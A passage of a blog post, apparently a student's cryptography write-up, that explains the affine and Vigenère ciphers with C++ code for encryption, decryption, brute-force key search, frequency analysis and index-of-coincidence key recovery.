class="line"><span class="built_in">cout</span><<s[i];<span class="comment">// non-letters pass through unchanged </span></span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<<span class="built_in">endl</span>;</span><br></pre></td></tr></table></figure></div>
<h3 id="攻击方法"><a href="#攻击方法" class="headerlink" title="攻击方法"></a>Attack methods</h3>
<h4 id="穷举攻击"><a href="#穷举攻击" class="headerlink" title="穷举攻击"></a>Exhaustive attack</h4>
<p>Brute-force breaking differs little from the decryption algorithm; the main point is to iterate over all k1 and k2 with for loops, excluding the meaningless encryption k1 = 1, k2 = 0. Note that because k1 is taken from a lookup table, every k1 value is guaranteed to be coprime to 26, so no coprimality check is needed. All possible plaintexts (311 cases in total) are listed, and the correct one is picked out by a known marker (such as <strong><em>flag</em></strong>) or because it forms meaningful words or phrases in natural language.</p>
<div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> j=<span class="number">0</span>;j<<span class="number">12</span>;j++)</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> k=<span class="number">0</span>;k<=<span class="number">25</span>;k++){</span><br><span class="line"><span class="keyword">if</span>(!(c[j]==<span class="number">1</span>&&k==<span class="number">0</span>)){</span><br><span class="line"><span class="comment">// skip k1=1,k2=0: the identity mapping, not a real encryption </span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len;i++)</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">if</span>(s[i]>=<span class="string">'A'</span>&&s[i]<=<span class="string">'Z'</span>)</span><br><span class="line">m[i]=(inverse[c[j]]*((<span class="keyword">int</span>)(s[i]-<span class="string">'A'</span>)-k+<span class="number">26</span>))%<span class="number">26</span>;</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(s[i]>=<span class="string">'a'</span>&&s[i]<=<span class="string">'z'</span>)</span><br><span class="line">m[i]=(inverse[c[j]]*((<span class="keyword">int</span>)(s[i]-<span class="string">'a'</span>)-k+<span class="number">26</span>))%<span class="number">26</span>;</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"k1="</span><<c[j]<<<span class="string">",k2="</span><<k<<<span class="string">": "</span>;<span class="comment">// one candidate key per line </span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len;i++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span>(s[i]>=<span class="string">'A'</span>&&s[i]<=<span class="string">'Z'</span>) <span class="built_in">cout</span><<(<span class="keyword">char</span>)(<span class="string">'A'</span>+m[i]);</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(s[i]>=<span class="string">'a'</span>&&s[i]<=<span class="string">'z'</span>) <span class="built_in">cout</span><<(<span class="keyword">char</span>)(<span class="string">'a'</span>+m[i]);</span><br><span class="line"><span class="keyword">else</span> <span class="built_in">cout</span><<s[i];</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<<span class="built_in">endl</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div>
<h4 id="统计分析攻击"><a href="#统计分析攻击" class="headerlink" title="统计分析攻击"></a>Statistical analysis attack</h4>
<p>Assume that the most frequent letter in the plaintext is e, followed by t (statistically); let the affine encryption function be e(x) = k1x + k2 (mod 26); let the offset of the most frequent ciphertext letter be a and that of the second most frequent be b. Then e('e') ≡ a (mod 26) => e(4) ≡ a (mod 26) => 4k1 + k2 ≡ a (mod 26); e('t') ≡ b (mod 26) => e(19) ≡ b (mod 26) => 19k1 + k2 ≡ b (mod 26)</p>
<p>Subtracting the two gives 15k1 ≡ (b - a) (mod 26), and the inverse of 15 is 7; multiplying both sides by the modular inverse of 15 gives k1 ≡ 7(b - a) (mod 26). To prevent k1 from becoming negative: k1 ≡ [7(b - a) (mod 26) + 26] (mod 26)</p>
<p>As an optimisation, consider only the most frequent letter e: 4k1 + k2 ≡ a (mod 26) => k2 ≡ [(a - 4k1) (mod 26) + 26] (mod 26);</p>
<p>Iterate over all k1 values in the table, compute the corresponding k2 for each, and decrypt with each pair in turn; the success rate of decryption improves markedly.</p>
<div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// statistical (frequency) analysis attack on the affine cipher </span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="comment">// use a priority queue to pull out the two most frequent letters </span></span><br><span class="line"><span class="comment">//priority_queue<int,vector<int>,greater<int> >q;// ascending </span></span><br><span class="line">priority_queue<<span class="keyword">int</span>,<span class="built_in">vector</span><<span class="keyword">int</span>>,less<<span class="keyword">int</span>> >q;<span class="comment">// descending </span></span><br><span class="line"><span class="keyword">const</span> <span class="keyword">int</span> maxn=<span class="number">1e4</span>;</span><br><span class="line"><span class="keyword">int</span> num[<span class="number">30</span>];</span><br><span class="line"><span class="keyword">char</span> str[maxn],str2[maxn];</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">int</span> c[<span class="number">15</span>]={<span class="number">1</span>,<span class="number">3</span>,<span class="number">5</span>,<span class="number">7</span>,<span class="number">9</span>,<span class="number">11</span>,<span class="number">15</span>,<span class="number">17</span>,<span class="number">19</span>,<span class="number">21</span>,<span class="number">23</span>,<span class="number">25</span>};<span class="comment">// all residues coprime to 26 </span></span><br><span class="line"><span class="keyword">int</span> inverse[<span class="number">100</span>];</span><br><span class="line"><span class="keyword">int</span> temp[<span class="number">100</span>]={<span class="number">1</span>,<span class="number">9</span>,<span class="number">21</span>,<span class="number">15</span>,<span class="number">3</span>,<span class="number">19</span>,<span class="number">7</span>,<span class="number">23</span>,<span class="number">11</span>,<span class="number">5</span>,<span class="number">17</span>,<span class="number">25</span>};<span class="comment">// inverse of c[i] mod 26 </span></span><br><span class="line"><span class="built_in">memset</span>(inverse,<span class="number">0</span>,<span class="keyword">sizeof</span>(inverse)); </span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">12</span>;i++)</span><br><span class="line">{</span><br><span class="line">inverse[c[i]]=temp[i];</span><br><span class="line">} </span><br><span class="line"><span class="keyword">while</span>(<span class="literal">true</span>)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">while</span>(!q.empty())</span><br><span class="line">{</span><br><span class="line">q.pop();</span><br><span class="line">}<span class="comment">// empty the queue </span></span><br><span class="line"><span class="built_in">memset</span>(num,<span class="number">0</span>,<span class="keyword">sizeof</span>(num));</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"Please enter your ciphertext:"</span>;</span><br><span class="line"><span class="built_in">cin</span>.getline(str,maxn);<span class="comment">// raw ciphertext </span></span><br><span class="line"><span class="keyword">int</span> len=<span class="built_in">strlen</span>(str);</span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len;i++)</span><br><span class="line"> {</span><br><span class="line"><span class="comment">// convert the ciphertext to lowercase for convenience </span></span><br><span class="line"><span class="keyword">if</span>(str[i]>=<span class="string">'A'</span>&&str[i]<=<span class="string">'Z'</span>)</span><br><span class="line">{</span><br><span class="line">str2[i]=str[i]+<span class="string">'a'</span>-<span class="string">'A'</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> str2[i]=str[i];</span><br><span class="line"> <span class="keyword">if</span>(str2[i]>=<span class="string">'a'</span>&&str2[i]<=<span class="string">'z'</span>)</span><br><span class="line"> {</span><br><span class="line">num[<span class="keyword">int</span>(str2[i]-<span class="string">'a'</span>)]++;</span><br><span class="line">}<span class="comment">// count the occurrences of each letter (case-insensitive) </span></span><br><span class="line"> }</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">26</span>;i++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span>(num[i]!=<span class="number">0</span>)</span><br><span class="line">q.push(num[i]);</span><br><span class="line">}<span class="comment">// push the counts into the queue so they are sorted automatically </span></span><br><span class="line"><span class="keyword">int</span> test1=<span class="number">0</span>; </span><br><span class="line"> <span class="keyword">int</span> test2=<span class="number">0</span>;</span><br><span class="line">test1=q.top();<span class="comment">// highest count </span></span><br><span class="line">q.pop(); </span><br><span class="line">test2=q.top();<span class="comment">// second highest count </span></span><br><span class="line"><span class="comment">//q.pop();</span></span><br><span class="line"><span class="keyword">int</span> a=<span class="number">0</span>;</span><br><span class="line"><span class="keyword">int</span> b=<span class="number">0</span>;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">26</span>;i++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span>(num[i]==test1)</span><br><span class="line">{</span><br><span class="line">a=i;</span><br><span class="line">}<span class="comment">// offset of the most frequent letter </span></span><br><span class="line"><span class="keyword">if</span>(num[i]==test2)</span><br><span class="line">{</span><br><span class="line">b=i;</span><br><span class="line">}<span class="comment">// offset of the second most frequent letter </span></span><br><span class="line">}</span><br><span class="line"><span class="keyword">int</span> k1=((b-a)*<span class="number">7</span>%<span class="number">26</span>+<span class="number">26</span>)%<span class="number">26</span>;<span class="comment">// +26 keeps the result non-negative </span></span><br><span class="line"><span class="keyword">int</span> k2=((a<span class="number">-4</span>*k1)%<span class="number">26</span>+<span class="number">26</span>)%<span class="number">26</span>; </span><br><span class="line"><span class="keyword">int</span> m[maxn];<span class="comment">// the recovered position of each letter goes into m[maxn] </span></span><br><span class="line"> <span class="keyword">int</span> k3=inverse[k1];<span class="comment">// modular inverse of k1 </span></span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len;i++)</span><br><span class="line"> {</span><br><span class="line">m[i]=(k3*((<span class="keyword">int</span>)(str2[i]-<span class="string">'a'</span>)-k2+<span class="number">26</span>))%<span class="number">26</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="built_in">cout</span><<<span class="string">"******Decryption******"</span><<<span class="built_in">endl</span>;</span><br><span class="line"> <span class="built_in">cout</span><<<span class="string">"k1="</span><<k1<<<span class="string">","</span><<<span class="string">"k2="</span><<k2<<<span class="built_in">endl</span>; </span><br><span class="line"> <span class="built_in">cout</span><<<span class="string">"The plaintext is:"</span><<<span class="built_in">endl</span>;</span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len;i++)</span><br><span class="line"> {</span><br><span class="line"><span class="keyword">if</span>(str[i]>=<span class="string">'A'</span>&&str[i]<=<span class="string">'Z'</span>)</span><br><span class="line"><span class="built_in">cout</span><<(<span class="keyword">char</span>)(<span class="string">'A'</span>+m[i]);</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(str[i]>=<span class="string">'a'</span>&&str[i]<=<span class="string">'z'</span>)</span><br><span class="line"><span class="built_in">cout</span><<(<span class="keyword">char</span>)(<span class="string">'a'</span>+m[i]);</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"><span class="built_in">cout</span><<str[i];</span><br><span class="line"> }</span><br><span class="line"> <span class="built_in">cout</span><<<span class="built_in">endl</span>;</span><br><span class="line"> <span class="built_in">cin</span>.ignore();</span><br><span class="line">}</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div>
<h3 id="运行结果"><a href="#运行结果" class="headerlink" title="运行结果"></a>Results</h3>
<h4 id="加密"><a href="#加密" class="headerlink" title="加密"></a>Encryption</h4>
<blockquote><p>Example: the plaintext is Hello CUMT~, k1 is 5 and k2 is 6; the ciphertext obtained is Pajjy QCOX.</p></blockquote>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/qOzk6a8Gp9h5IZi.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<h4 id="已知-key-解密"><a href="#已知-key-解密" class="headerlink" title="已知 key\ 解密"></a>Decryption with a known <strong><em>key</em></strong></h4>
<blockquote><p>Example: the ciphertext is Pajjy QCOX, k1 is 5 and k2 is 6; the plaintext obtained is Hello CUMT.</p></blockquote>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/iRODWVHwXferFUI.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<h4 id="暴力枚举解密"><a href="#暴力枚举解密" class="headerlink" title="暴力枚举解密"></a>Brute-force decryption</h4>
<blockquote><p>Example: the ciphertext is Pajjy QCOX with k1 and k2 unknown; all possibilities are enumerated by brute force, and the plaintext is picked out by a known marker or because it is meaningful in natural language: Hello CUMT.</p></blockquote>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/LmA3OSY2zFyr8bu.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<h4 id="统计分析解密"><a href="#统计分析解密" class="headerlink" title="统计分析解密"></a>Statistical-analysis decryption</h4>
<blockquote><p>Example decryption:</p><p><strong><em>Pu yfo of oin hvy ufa hrpkpyb, jlar ph hopkk py oin hvy oinan, svo jn jpkk klvbi rfan zfyupgnyo zlkr; pu ovayng of ufvyg iph fjy hilgfj, lmmafmaplon nhzlmn, oin hvy jpkk sn oiafvbi oin inlao,jlar nlzi mklzn snipyg oin zfayna; pu ly fvohoanozing mlkr zlyyfo ulkk svoonaukx, oiny zknyzing jlcpyb larh, bpcny mfjna; pu P zly’o ilcn sapbio hrpkn, po jpkk ulzn of oin hvyhipyn, lyg hvyhipyn hrpkn ofbnoina, py uvkk skffr.</em></strong></p><p>The result is:</p><p><strong><em>If not to the sun for smiling, warm is still in the sun there, but we will laugh more confident calm; if turned to found his own shadow, appropriate escape, the sun will be through the heart,warm each place behind the corner; if an outstretched palm cannot fall butterfly, then clenched waving arms, given power; if I can’t have bright smile, it will face to the sunshine, and sunshine smile together, in full bloom.</em></strong></p></blockquote>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/UtEgOBxj6PVSNnd.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<h3 id="安全性分析"><a href="#安全性分析" class="headerlink" title="安全性分析"></a>Security analysis</h3>
<p>Since gcd(k1, 26) = 1, k1 has φ(26) = 12 possible values and k2 has 26; excluding the case k1 = 1, k2 = 0, the key space is 12×26−1 = 311. Compared with the plain shift cipher and the multiplicative cipher this is a considerable improvement, but the key space is still far too small: even a brute-force attack recovers the plaintext with ease. A better approach is an attack based on statistical regularities (provided the intercepted ciphertext is long enough). In fact, since there are only two parameters, two known plaintext-ciphertext pairs are enough to solve for both parameters and break the cipher completely.</p>
<h2 id="维吉尼亚密码-Vigenere-cipher"><a href="#维吉尼亚密码-Vigenere-cipher" class="headerlink" title="维吉尼亚密码 Vigenère cipher"></a>Vigenère Cipher</h2>
<h3 id="概述-1"><a href="#概述-1" class="headerlink" title="概述"></a>Overview</h3>
<p>The Vigenère cipher is a simple polyalphabetic substitution cipher that can be seen as a set of Caesar ciphers with different shifts. To mask the frequency characteristics exposed by letter usage, the solution is to replace the original text using several alphabets. It is a table: the first row holds the plaintext letters, each row below it gives which letters replace the plaintext letters, and each column indicates which alphabet is used for the replacement. With 26 letters there are 26 substitution alphabets, so the table is 26×26.</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/x1ZTeam7OHnS3kR.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<h3 id="算法实现-1"><a href="#算法实现-1" class="headerlink" title="算法实现"></a>Algorithm implementation</h3>
<h4 id="加密算法-1"><a href="#加密算法-1" class="headerlink" title="加密算法"></a>Encryption algorithm</h4>
<p>s2[i]='A'+(s2[i]+(s1[j%len1]-'a')-'A')%26;</p>
<p>Note in particular that if the key is shorter than the plaintext, the key is reused cyclically; in our code this is the modulo by len1.</p>
<div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// assumed context: s1 is the lowercase key of length len1, s2 the text to encrypt of length len2 </span></span><br><span class="line"><span class="keyword">int</span> j=<span class="number">0</span>;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len2;i++)</span><br><span class="line">{</span><br><span class="line"><span class="comment">// a space or other non-letter does not use (or consume) a key character </span></span><br><span class="line"><span class="comment">// j tracks the current key position </span></span><br><span class="line"><span class="keyword">if</span>(s2[i]>=<span class="string">'A'</span>&&s2[i]<=<span class="string">'Z'</span>)</span><br><span class="line">{</span><br><span class="line">s2[i]=<span class="string">'A'</span>+(s2[i]+(s1[j%len1]-<span class="string">'a'</span>)-<span class="string">'A'</span>)%<span class="number">26</span>;</span><br><span class="line">j++;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(s2[i]>=<span class="string">'a'</span>&&s2[i]<=<span class="string">'z'</span>)</span><br><span class="line">{</span><br><span class="line">s2[i]=<span class="string">'a'</span>+(s2[i]+(s1[j%len1]-<span class="string">'a'</span>)-<span class="string">'a'</span>)%<span class="number">26</span>;</span><br><span class="line">j++;</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<s2[i];</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div>
<h4 id="解密算法-1"><a href="#解密算法-1" class="headerlink" title="解密算法"></a>Decryption algorithm</h4>
<p>s2[i]='A'+(s2[i]-'A'-(s1[j%len1]-'a')+26)%26;</p>
<p>Adding 26 here prevents a negative result.</p>
<div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// assumed context: s1 is the lowercase key of length len1, s2 the ciphertext to decrypt of length len2 </span></span><br><span class="line"><span class="keyword">int</span> j=<span class="number">0</span>;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len2;i++)</span><br><span class="line">{</span><br><span class="line"><span class="comment">// a space or other non-letter does not use (or consume) a key character </span></span><br><span class="line"><span class="keyword">if</span>(s2[i]>=<span class="string">'A'</span>&&s2[i]<=<span class="string">'Z'</span>)</span><br><span class="line">{</span><br><span class="line">s2[i]=<span class="string">'A'</span>+(s2[i]-<span class="string">'A'</span>-(s1[j%len1]-<span class="string">'a'</span>)+<span class="number">26</span>)%<span class="number">26</span>;</span><br><span class="line">j++;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(s2[i]>=<span class="string">'a'</span>&&s2[i]<=<span class="string">'z'</span>)</span><br><span class="line">{</span><br><span class="line">s2[i]=<span class="string">'a'</span>+(s2[i]-<span class="string">'a'</span>-(s1[j%len1]-<span class="string">'a'</span>)+<span class="number">26</span>)%<span class="number">26</span>;</span><br><span class="line">j++;</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<s2[i];</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div>
<h4 id="其他考虑"><a href="#其他考虑" class="headerlink" title="其他考虑"></a>Other considerations</h4>
<p>Upper- and lowercase letters are handled exactly as in the Caesar cipher.</p>
<p>Characters other than letters neither use nor consume the key; for them the ciphertext is the plaintext and the plaintext is the ciphertext.</p>
<h3 id="攻击方法-1"><a href="#攻击方法-1" class="headerlink" title="攻击方法"></a>Attack methods</h3>
<p>The key to breaking the Vigenère cipher is that its key repeats cyclically. Once the key length is known, the ciphertext can be viewed as interleaved Caesar ciphers, each of which can be broken separately.</p>
<p>Cryptanalysis of polyalphabetic substitution ciphers has three main steps: first determine the key length, commonly with the Kasiski test or the index of coincidence; second determine the key, commonly with the mutual index of coincidence test; third recover the plaintext from the key found in the second step.</p>
<h4 id="Kasiski测试法"><a href="#Kasiski测试法" class="headerlink" title="Kasiski测试法"></a>Kasiski test</h4>
<p>The Kasiski test rests on the fact that common words such as "the" may be encrypted with the same key letters and therefore recur in the ciphertext. If all repeated letter groups in the ciphertext are found and the greatest common divisor of their distances is computed, the key length can often be extracted.</p>
<p>Procedure: search for pairs of identical ciphertext segments of length at least 2 and record the distances between them; the key length d is likely to be the greatest common divisor of these distances.</p>
<h4 id="重合指数法"><a href="#重合指数法" class="headerlink" title="重合指数法"></a>Index of coincidence</h4>
<p>The index of coincidence uses the difference in statistical probabilities between random text and English text to determine the key length. Basis: the letters of English occur with different frequencies.</p>
<p>Index of coincidence formula:</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/oZVXxwTfcpnWLj4.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<p>An estimate of the probability distribution of the 26 English letters is available. The expected value is:</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/Ehs7cYJCdxnVkwP.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<p>Split the ciphertext into n groups; when the index of coincidence of every group is close to 0.065, n is the key length</p>
<h3 id="完整代码"><a href="#完整代码" class="headerlink" title="完整代码"></a>Full code</h3>
<div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"> <span class="keyword">while</span>(<span class="literal">true</span>)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">float</span> IC[clen];<span class="comment">// index of coincidence of each group</span></span><br><span class="line"> <span class="built_in">memset</span>(IC,<span class="number">0</span>,<span class="keyword">sizeof</span>(IC));</span><br><span class="line"><span class="keyword">float</span> avgIC=<span class="number">0</span>;<span class="comment">// average index of coincidence</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<klen;i++)<span class="comment">// count the letters of each group </span></span><br><span class="line">{</span><br><span class="line"> <span class="built_in">memset</span>(num,<span class="number">0</span>,<span class="keyword">sizeof</span>(num));<span class="comment">// array holding the letter counts</span></span><br><span class="line"> <span class="comment">// the key length equals the number of groups</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> j=<span class="number">0</span>;i+j*klen<clen;j++) <span class="comment">// count each letter's occurrences within this group </span></span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span>(c[i+j*klen]>=<span class="string">'A'</span>&&c[i+j*klen]<=<span class="string">'Z'</span>)</span><br><span class="line">{ </span><br><span class="line">num[(<span class="keyword">int</span>)(c[i+j*klen]-<span class="string">'A'</span>)]++;</span><br><span class="line">} </span><br><span class="line"><span class="keyword">if</span>(c[i+j*klen]>=<span class="string">'a'</span>&&c[i+j*klen]<=<span class="string">'z'</span>)</span><br><span class="line">{ </span><br><span class="line">num[(<span class="keyword">int</span>)(c[i+j*klen]-<span class="string">'a'</span>)]++;</span><br><span class="line">}</span><br><span class="line">} </span><br><span class="line"> <span class="keyword">float</span> e=<span class="number">0</span>;<span class="comment">// IC value; it is fractional, so int will not do </span></span><br><span class="line"> <span class="keyword">int</span> L=<span class="number">0</span>; </span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> k=<span class="number">0</span>;k<<span class="number">26</span>;k++)<span class="comment">// length of this sub-ciphertext </span></span><br><span class="line"> {</span><br><span class="line"> L+=num[k]; <span class="comment">// sum all the letter counts </span></span><br><span class="line"> } <span class="comment">// L is the sub-ciphertext length </span></span><br><span class="line"> L*=(L<span class="number">-1</span>);<span class="comment">// denominator, L=L*(L-1)</span></span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> k=<span class="number">0</span>;k<<span class="number">26</span>;k++)<span class="comment">// compute the IC of this group </span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span>(num[k]!=<span class="number">0</span>)</span><br><span class="line"> {</span><br><span class="line">e+=((<span class="keyword">float</span>)num[k]*(<span class="keyword">float</span>)(num[k]<span class="number">-1</span>))/(<span class="keyword">float</span>)L; <span class="comment">//xi(xi-1)/L(L-1) </span></span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">IC[i]=e;<span class="comment">// unbiased estimate for this group </span></span><br><span class="line">} </span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<klen;i++)</span><br><span class="line">{</span><br><span class="line">avgIC+=IC[i];</span><br><span class="line">}</span><br><span class="line">avgIC/=klen;<span class="comment">// average IC; klen starts at 1 </span></span><br><span class="line"> <span class="keyword">if</span>(avgIC>=<span class="number">0.065</span>)<span class="keyword">break</span>;<span class="comment">// exit condition: is the average IC at least 0.065 </span></span><br><span class="line"> <span class="keyword">else</span> klen++;</span><br><span class="line"><span 
class="comment">// cout<<"密钥长度为:"<<klen<<endl;</span></span><br><span class="line"> }</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"密钥长度为:"</span><<klen<<<span class="built_in">endl</span>;</span><br><span class="line"><span class="comment">//计算拟重合指数 </span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<klen;i++) <span class="comment">// 统计分组字母个数 </span></span><br><span class="line">{</span><br><span class="line"><span class="keyword">int</span> g=<span class="number">0</span>;<span class="comment">// 密文移动 g 个位置 </span></span><br><span class="line"><span class="keyword">float</span> temp[<span class="number">26</span>];<span class="comment">// 存储偏移量 </span></span><br><span class="line"><span class="built_in">memset</span>(temp,<span class="number">0</span>,<span class="keyword">sizeof</span>(temp));</span><br><span class="line"><span class="keyword">for</span>(g=<span class="number">0</span>;g<<span class="number">26</span>;g++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">float</span> x=<span class="number">0</span>;<span class="comment">// 拟重合指数 </span></span><br><span class="line"><span class="built_in">memset</span>(num,<span class="number">0</span>,<span class="keyword">sizeof</span>(num));<span class="comment">// 盛放字母个数的数组</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> j=<span class="number">0</span>;i+j*klen<clen;j++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span>(c[i+j*klen]>=<span class="string">'A'</span>&&c[i+j*klen]<=<span class="string">'Z'</span>)</span><br><span class="line">{ </span><br><span class="line">num[(<span class="keyword">int</span>)(c[i+j*klen]-<span class="string">'A'</span>)]++;</span><br><span class="line">}</span><br><span class="line"><span 
class="keyword">if</span>(c[i+j*klen]>=<span class="string">'a'</span>&&c[i+j*klen]<=<span class="string">'z'</span>)</span><br><span class="line">{ </span><br><span class="line">num[(<span class="keyword">int</span>)(c[i+j*klen]-<span class="string">'a'</span>)]++;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"> <span class="keyword">int</span> L=<span class="number">0</span>;</span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> k=<span class="number">0</span>;k<<span class="number">26</span>;k++)<span class="comment">// 子串密文长度</span></span><br><span class="line">{</span><br><span class="line">L+=num[k];</span><br><span class="line">x=x+p[k]*num[(k+g)%<span class="number">26</span>];</span><br><span class="line"> }</span><br><span class="line"> temp[g]=<span class="built_in">abs</span>(x/L<span class="number">-0.065</span>);</span><br><span class="line">}</span><br><span class="line"><span class="keyword">float</span> value=temp[<span class="number">0</span>]; </span><br><span class="line"><span class="keyword">int</span> result=<span class="number">0</span>;</span><br><span class="line"><span class="keyword">for</span>(g=<span class="number">0</span>;g<<span class="number">26</span>;g++)<span class="comment">// 找最小偏差 </span></span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span>(temp[g]<value)</span><br><span class="line">{</span><br><span class="line">value=temp[g];</span><br><span class="line">result=g;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">key[i]=result;</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"加密密钥为:"</span>;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<klen;i++)</span><br><span class="line">{</span><br><span 
class="line">s2[i]=<span class="keyword">char</span>(<span class="string">'a'</span>+key[i]);</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><h3 id="运行结果-1"><a href="#运行结果-1" class="headerlink" title="运行结果"></a>运行结果</h3><h4 id="加密-1"><a href="#加密-1" class="headerlink" title="加密"></a>加密</h4><blockquote><p>例如明文是 Haha CUMTer~ ,密钥是 password,得到密文 Wazs YIDWtr~ 。</p></blockquote><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/V5B1GtPknLvWmCg.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h4 id="解密"><a href="#解密" class="headerlink" title="解密"></a>解密</h4><blockquote><p>例如密文是 Wazs YIDWtr~ ,密钥是 password,得到明文 Haha CUMTer~。</p></blockquote><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/7FhAy8vOo9nCJcX.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h4 id="破解"><a href="#破解" class="headerlink" 
